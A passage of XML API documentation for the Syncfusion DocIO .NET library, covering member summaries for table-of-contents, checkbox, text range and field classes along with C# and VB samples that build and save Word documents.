        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.UpdateTOCField">
            <summary>
            Updates the TOC field.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.ParseDocument(System.Collections.Generic.List{System.String})">
            <summary>
            Parses the document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.ParseTextBody(Syncfusion.DocIO.DLS.WTextBody,System.Collections.Generic.List{System.String},System.Collections.Generic.List{Syncfusion.DocIO.DLS.ParagraphItem})">
            <summary>
            Parses the text body.
            </summary>
            <param name="textBody">The text body.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.ParseTable(Syncfusion.DocIO.DLS.IWTable,System.Collections.Generic.List{System.String},System.Collections.Generic.List{Syncfusion.DocIO.DLS.ParagraphItem})">
            <summary>
            Parses the table.
            </summary>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.ParseParagraph(Syncfusion.DocIO.DLS.IWParagraph,System.Collections.Generic.List{System.String},System.Collections.Generic.List{Syncfusion.DocIO.DLS.ParagraphItem})">
            <summary>
            Parses the paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.CheckAndSplitParagraph(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Checks and splits the paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.UpdateTabCharacters(Syncfusion.DocIO.DLS.WTextRange)">
            <summary>
            Updates the tab characters.
            </summary>
            <param name="textRange">The text range.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.UpdateNewLineCharacters(Syncfusion.DocIO.DLS.WTextRange,System.String)">
            <summary>
            Updates the new line characters.
            </summary>
            <param name="textRange">The text range.</param>
            <param name="splitText">The split text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.CreateParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Creates the paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="index">The index.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.RemoveUpdatedTocEntries">
            <summary>
            Removes the updated toc entries.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.RemoveExistingTocBookmarks">
            <summary>
            Removes the existing toc bookmarks.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.CheckParagraphStyle(System.String)">
            <summary>
            Checks the paragraph style.
            </summary>
            <param name="styleName">Name of the style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.CheckAndGetTOCLinkStyle(Syncfusion.DocIO.DLS.WParagraph,System.Boolean@,System.Collections.Generic.List{System.String},System.Collections.Generic.List{Syncfusion.DocIO.DLS.ParagraphItem})">
            <summary>
            Return the Toc link style.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.GetTOCLevel(System.String)">
            <summary>
            Gets the TOC level.
            </summary>
            <param name="styleName">Name of the style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.InsertBookmark(Syncfusion.DocIO.DLS.IWParagraph,Syncfusion.DocIO.DLS.WField,System.Int32,System.Int32,System.Boolean@,System.Collections.Generic.List{System.String},System.Collections.Generic.List{Syncfusion.DocIO.DLS.ParagraphItem})">
            <summary>
            Inserts the bookmark.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="field">The field.</param>
            <param name="startIndex">The start index.</param>
            <param name="endIndex">The end index.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.InsertBookmarkHyperlink(Syncfusion.DocIO.DLS.IWParagraph,Syncfusion.DocIO.DLS.WField,System.String,System.Boolean@,System.Collections.Generic.List{System.String},System.Collections.Generic.List{Syncfusion.DocIO.DLS.ParagraphItem})">
            <summary>
            Inserts the bookmark hyperlink.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="field">The field.</param>
            <param name="bookmark">The bookmark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.CreateHyperlink(Syncfusion.DocIO.DLS.IWParagraph,Syncfusion.DocIO.DLS.WParagraph,System.String,System.String,System.Boolean@,System.Collections.Generic.List{System.String})">
            <summary>
            Creates the hyperlink.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="tocParagraph">The toc paragraph.</param>
            <param name="text">The text.</param>
            <param name="bookmark">The bookmark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.CreateHyperLink(Syncfusion.DocIO.DLS.IWParagraph,Syncfusion.DocIO.DLS.WParagraph,System.Boolean,System.Collections.Generic.List{System.String})">
            <summary>
            Creates the hyperlink for field value null
            </summary>
            <param name="paragraph">Current paragraph</param>
            <param name="tocParagraph">TOC paragraph</param>
            <param name="isTocReferLinkStyle"><c>true</c> when is to reference link style, else<c>false</c></param>
            <param name="tocLinkStyles">List of TOC link styles</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.AppendTextToTocParagraph(Syncfusion.DocIO.DLS.WTextRange,System.String,Syncfusion.DocIO.DLS.WParagraphStyle,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Append text into toc paragraph
            </summary>
            <param name="paragraphTextRange">Paragraph textrange</param>
            <param name="txtValue">Paragraph textrange value</param>
            <param name="paragraphStyle">Paragraph style</param>
            <param name="tocParagraph">Toc paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.IsNeedToApplyFormatting(System.Int16,Syncfusion.DocIO.DLS.WParagraphStyle,Syncfusion.DocIO.DLS.WTextRange,Syncfusion.DocIO.DLS.WCharacterStyle)">
            <summary>
            To identify the whether text range formatting applied to toc text range or not
            </summary>
            <param name="key">Current formatting key</param>
            <param name="paragraphStyle">Current paragraph style</param>
            <param name="paragraphTextRange">Current text range</param>
            <param name="charStyle">Current text range character style</param>
            <returns><c>true</c>if character style or inline character formatting have value
            and customer paragraph style doesn't have key else <c>false</c></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.IsNeedToAddTabStop(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            To identify the tab is first or last item in its owner paragraph
            </summary>
            <param name="paragraph">Current heding paragraph</param>
            <param name="currentTabItemIndex">Current tab index</param>
            <returns><c>true</c>if the tab is first item or after tab item, thers is 
            no text in its owner paragraph, else <c>false</c></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.IsNeedToAddTabStop(System.Int32,System.Int32,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            To identify the tab is first or last item in its owner paragraph
            </summary>
            <param name="startIndex">Start tab index</param>
            <param name="endIndex">End tab index</param>
            <param name="ownerParagraph">Owner paragraph</param>
            <returns><c>true</c>if the tab is first item or after tab item, thers is 
            no text in its owner paragraph, else <c>false</c></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.UpdateTabStopPosition(Syncfusion.DocIO.DLS.WParagraph,System.Boolean@)">
            <summary>
            Get the tab stop position for the first  occurrence tab in current toc paragraph
            </summary>
            <param name="paragraph">Current Toc paragraph</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.GetTabPositionBasedParagraphStyle(Syncfusion.DocIO.DLS.TabCollection,System.Boolean@,System.Single,System.Single)">
            <summary>
            Get the tab stop position from the paragraph style 
            </summary>
            <param name="tabs">Tab collection in paragraph style</param>
            <param name="isTabStopPosFromStyle"><c>true</c>when the tab stop position from style</param>
            <param name="preTextLength">Previous text length</param>
            <param name="tabStopPosition">Tab stop position</param>
            <returns>Tab stop position</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.createHyperLinkForLinkStyle(Syncfusion.DocIO.DLS.IWParagraph,Syncfusion.DocIO.DLS.WParagraph,System.Collections.Generic.List{System.String})">
            <summary>
            Creates the hyper link for link style.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="tocParagraph">The toc paragraph.</param>
            <param name="tocLinkStyles">The toc link styles.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.GetTOCValidItemIndex(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Gets the index of the toc valid item.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.AddTabsAndPageRefField(Syncfusion.DocIO.DLS.WParagraph,System.String)">
            <summary>
            Updates the tabs.
            </summary>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.GetTabPosition(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Gets the tab position.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.CreateTOCParagraph(System.Int32)">
            <summary>
            Creates the TOC paragraph.
            </summary>
            <param name="level">The level.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.GenerateBookmarkName">
            <summary>
            Generates the name of the bookmark.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.UpdatePageNumbers(System.Int32[])">
            <summary>
            Updates the page numbers.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.UpdateList(Syncfusion.DocIO.DLS.IWParagraph,Syncfusion.DocIO.DLS.WParagraph,System.Boolean@)">
            <summary>
            Updates the list.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="tocParagraph">The toc paragraph.</param>
            <param name="isTabAdded">Set to <c>True</c>when the list tab added into the toc paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.AddListValueAndTab(Syncfusion.DocIO.DLS.IWParagraph,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraphStyle,System.String,System.Boolean@)">
            <summary>
            Adds the list value and tab.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="tocParagraph">The toc paragraph.</param>
            <param name="listValue">The list value.</param>
            <param name="isTabAdded">Set to <c>True</c>when the list tab added into the toc paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.CloneImpl">
            <summary>
            Creates a duplicate copy of the <see cref="T:Syncfusion.DocIO.DLS.TableOfContent"/>.
            <exclude/>
            </summary>
            <returns>The reference of the newly created <see cref="T:Syncfusion.DocIO.DLS.TableOfContent"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.UseHeadingStyles">
            <summary>
            Gets or sets a value indicating whether to use default heading styles.
            </summary>
            <value><b>True</b> if it uses heading styles; otherwise <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.UpperHeadingLevel">
            <summary>
            Gets or sets the ending heading level of the table of contents. The default value is 3.
            </summary>
            <value>The <b>integer</b> specifying the upper heading level.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.LowerHeadingLevel">
            <summary>
            Gets or sets the starting heading level of the table of contents. The default value is 1.
            </summary>
            <value>The <b>integer</b> specifying the starting heading level.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.UseTableEntryFields">
            <summary>
            Gets or sets a value indicating whether to use table entry fields. The default value is false.
            </summary>
            <value><b>True</b> if it uses table entry fields; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.TableID">
            <summary>
            Gets or sets the table ID.
            </summary>
            <value>The table ID.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.RightAlignPageNumbers">
            <summary>
            Gets or sets a value indicating whether to show page numbers as right aligned. The default value is true.
            </summary>
            <value><b>True</b> if to right align page numbers; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.IncludePageNumbers">
            <summary>
            Gets or sets a value indicating whether to show page numbers in table of contents. The default value is true.
            </summary>
            <value><b>True</b> if to includes page numbers; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.UseHyperlinks">
            <summary>
            Gets or sets a value indicating whether to use hyperlinks for the levels. The default value is true.
            </summary>
            <value><b>True</b> if it uses hyperlinks for levels; otherwise <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.UseOutlineLevels">
            <summary>
            Gets or sets a value indicating whether to use outline levels. The default value is false.
            </summary>
            <value><b>True</b> if it uses outline levels; otherwise <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current 
            <see cref="T:Syncfusion.DocIO.DLS.TableOfContent"/>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.FormattingString">
            <summary>
            Gets or sets the formatting string.
            </summary>
            <value>The formatting string.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.TOCField">
            <summary>
            Gets TOC field
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.TOCStyles">
            <summary>
            Gets the TOC styles.
            </summary>
            <value>The TOC styles.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.TOCLevels">
            <summary>
            Gets the TOC levels.
            </summary>
            <value>The TOC levels.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.LastTOCParagraph">
            <summary>
            Gets the last TOC paragraph.
            </summary>
            <value>The last TOC paragraph.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.InvalidFormatString">
            <summary>
            Gets or sets a value indicating whether [invalid format string].
            </summary>
            <value>
              <c>true</c> if [invalid format string]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.FormattingParsed">
            <summary>
            Gets or sets a value indicating whether [formatting parsed].
            </summary>
            <value>
              <c>true</c> if [formatting parsed]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableOfContent.Syncfusion#Layouting#ILayoutInfo#Size">
            <summary>
            Gets/Sets the Text Size of the TextRange
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WCheckBox">
            <summary>
            Represents the check box in the Word document.
            </summary>
            <example>The following code illustrates how to add a new checkbox. 
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                paragraph.AppendText("Gender\t");
                //Append new Checkbox
                WCheckBox checkbox = paragraph.AppendCheckBox();
                checkbox.Checked = false;
                //Set Checkbox size
                checkbox.CheckBoxSize = 10; 
                checkbox.CalculateOnExit = true;
                //Set help text
                checkbox.Help = "Help text";
                paragraph.AppendText("Male\t");
                checkbox = paragraph.AppendCheckBox();
                checkbox.Checked = false;
                checkbox.CheckBoxSize = 10;
                checkbox.CalculateOnExit = true;
                paragraph.AppendText("Female");
                //Save the Word document
                document.Save("Checkbox.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            </example>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WFormField">
            <summary>
            Summary description for WFormField.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WField">
            <summary>
            Represents the field in the document.
            </summary>    
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WTextRange">
            <summary>
            Represents the text in the Word document. Each part of text can have separate formatting.
            </summary>   
            <example>The following example illustrates how to add a text to the document.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Initialize new text range instance
                IWTextRange textrange = new WTextRange(document);
                //Add text and its formatting
                textrange.Text = "A new text is added";
                text.CharacterFormat.FontSize = 14;
                text.CharacterFormat.Bold = true;
                text.CharacterFormat.TextColor = Color.Green;
                //Add text range to the paragraph
                paragraph.Items.Add(textrange);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Initialize new text range instance
                Dim textrange As IWTextRange = New WTextRange(document)
                'Add text and its formatting
                textrange.Text = "A new text is added"
                text.CharacterFormat.FontSize = 14
                text.CharacterFormat.Bold = True
                text.CharacterFormat.TextColor = Color.Green
                'Add text range to the paragraph
                paragraph.Items.Add(textrange)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="T:Syncfusion.Layouting.IStringWidget">
            <summary>
            Represents a Widget with string-like layout.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.ISplitLeafWidget">
            <summary>
            Represents a LEAF Widget that can SPLIT self.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.ISplitLeafWidget.SplitBySize(Syncfusion.DocIO.Rendering.DrawingContext,System.Drawing.SizeF,System.Single,System.Single,System.Boolean@,System.Boolean,System.Boolean)">
            <summary>
            Splits the size of the by.
            </summary>
            <param name="dc">The dc.</param>
            <param name="size">The size.</param>
            <param name="clientWidth">The clientWidth.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.Layouting.ITextMeasurable">
            <summary>
            Represnts an widget which can be measure itself.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.ITextMeasurable.Measure(System.String)">
            <summary>
            Measures size of specified string.
            </summary>
            <param name="graphics"></param>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.ITextMeasurable.Measure(Syncfusion.DocIO.Rendering.DrawingContext,System.String)">
            <summary>
            Measures size of specified string.
            </summary>
            <param name="graphics"></param>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.IStringWidget.OffsetToIndex(Syncfusion.DocIO.Rendering.DrawingContext,System.Double,System.String,System.Single,System.Single,System.Boolean)">
            <summary>
            Offsets to index.
            </summary>
            <param name="graphics">The graphics.</param>
            <param name="offset">The offset.</param>
            <param name="text">The text.</param>
            <param name="clientWidth">The clientWidth.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.IStringWidget.GetTextAscent(Syncfusion.DocIO.Rendering.DrawingContext,System.Single@)">
            <summary>
            Gets text ascent.
            </summary>
            <param name="graphics"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.Layouting.IStringWidget.Text">
            <summary>
            Gets text string.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WTextRange.m_txtLength">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WTextRange.m_detachedText">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WTextRange.m_ascent">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTextRange"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.AttachToParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Attaches to paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="itemPos">The item pos.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.Attach(Syncfusion.DocIO.DLS.WParagraph,System.Int32,System.Boolean)">
            <summary>
            Attaches to paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="itemPos">The item pos.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.Detach">
            <summary>
            Detaches from owner.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.CloneImpl">
            <summary>
            Creates a duplicate copy of the text.
            <exclude/>
            </summary>
            <returns>The reference to the newly created <see cref="T:Syncfusion.DocIO.DLS.WTextRange"/> instance.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.ApplyCharacterFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Applies the specified character format to the text.
            </summary>
            <param name="charFormat">The <see cref="T:Syncfusion.DocIO.DLS.WCharacterFormat"/> to be applied to the text.</param>
            <example>The following example illustrates how to add a text to the document.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                document.EnsureMinimal();
                //Add new text
                IWTextRange text = document.LastParagraph.AppendText("Hello world");
                //Initialize character format
                WCharacterFormat characterformat = new WCharacterFormat(document);
                characterformat.Bold = true;
                characterformat.Italic = true;
                characterformat.TextColor = Color.Blue;
                //Apply character format
                text.ApplyCharacterFormat(characterformat);
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                document.EnsureMinimal()
                'Add new text
                Dim text As IWTextRange = document.LastParagraph.AppendText("Hello world")
                'Initialize character format
                Dim characterformat As New WCharacterFormat(document)
                characterformat.Bold = True
                characterformat.Italic = True
                characterformat.TextColor = Color.Blue
                'Apply character format
                text.ApplyCharacterFormat(characterformat)
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.SplitWidgets">
            <summary>
            Split the widgets based on the control characters tab ("\t") and carriage return ("\r")
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.SplitByTab">
            <summary>
            Splits the widget by tab.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.Close">
            <summary>
            Closes the item.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.SplitByParagraphBreak">
            <summary>
            Splits the widget by paragraph break.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.WriteXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            Writes object data as inside xml element.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.ReadXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The value indicating the presence of xml content.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.GetTextRangeSize(Syncfusion.DocIO.DLS.WTextRange)">
            <summary>
            Measure Size of the TextRange
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.Syncfusion#Layouting#ITextMeasurable#Measure(System.String)">
            <summary>
            
            </summary>
            <param name="cg"></param>
            <param name="offset"></param>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.Syncfusion#Layouting#ITextMeasurable#Measure(Syncfusion.DocIO.Rendering.DrawingContext,System.String)">
            <summary>
            
            </summary>
            <param name="cg"></param>
            <param name="offset"></param>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.Syncfusion#Layouting#IStringWidget#GetTextAscent(Syncfusion.DocIO.Rendering.DrawingContext,System.Single@)">
            <summary>
            
            </summary>
            <param name="cg"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.GetFont">
            <summary>
            Get Font of the TextRange or Field
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.Syncfusion#Layouting#IStringWidget#OffsetToIndex(Syncfusion.DocIO.Rendering.DrawingContext,System.Double,System.String,System.Single,System.Single,System.Boolean)">
            <summary>
            Offsets to index.
            </summary>
            <param name="dc"></param>
            <param name="offset">The offset.</param>
            <param name="text">The text.</param>
            <param name="clientWidth">The clientWidth.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.GetClientWidth(Syncfusion.DocIO.Rendering.DrawingContext,System.Single)">
            <summary>
            Determines current section client width.
            </summary>
            <param name="clientWidth">The clientWidth.</param>
            <returns>Client Width</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.Syncfusion#Layouting#ISplitLeafWidget#SplitBySize(Syncfusion.DocIO.Rendering.DrawingContext,System.Drawing.SizeF,System.Single,System.Single,System.Boolean@,System.Boolean,System.Boolean)">
            <summary>
            
            </summary>
            <param name="cg"></param>
            <param name="offset"></param>
            <param name="clientWidth">The clientWidth.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.IsLastTextRangeWithSpace(System.String)">
            <summary>
            Determine whether the text range is last item of the paragraph and which have text with empty space
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextRange.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextRange.Text">
            <summary>
            Gets or sets the text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextRange.CharacterFormat">
            <summary>
            Gets the character format(font properties) of the text. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextRange.TextLength">
            <summary>
            Gets or Sets the length of the text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextRange.EndPos">
            <summary>
            Gets the end pos.
            </summary>
            <value>The end pos.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextRange.SafeText">
            <summary>
            Defines if text of current text range is safe.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextRange.IsParagraphMark">
            <summary>
            Gets a boolean value indicating whether this text range is paragraph mark.
            </summary>
            <value>
              <c>true</c> if paragraph mark; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WTextRange.LayoutTabInfo">
            <summary>
            /
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextRange.LayoutTabInfo.#ctor(Syncfusion.DocIO.DLS.WTextRange)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTextRange.LayoutTabInfo"/> class.
            </summary>
            <param name="textRange">The text range.</param>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WField.m_fieldPattern">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WField.m_fieldType">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WField.m_bConvertedToText">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WField.m_paraItemType">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WField.m_formattingString">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WField.m_fieldValue">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WField.m_textFormat">
            <summary>
            <exclude/>
            </summary>
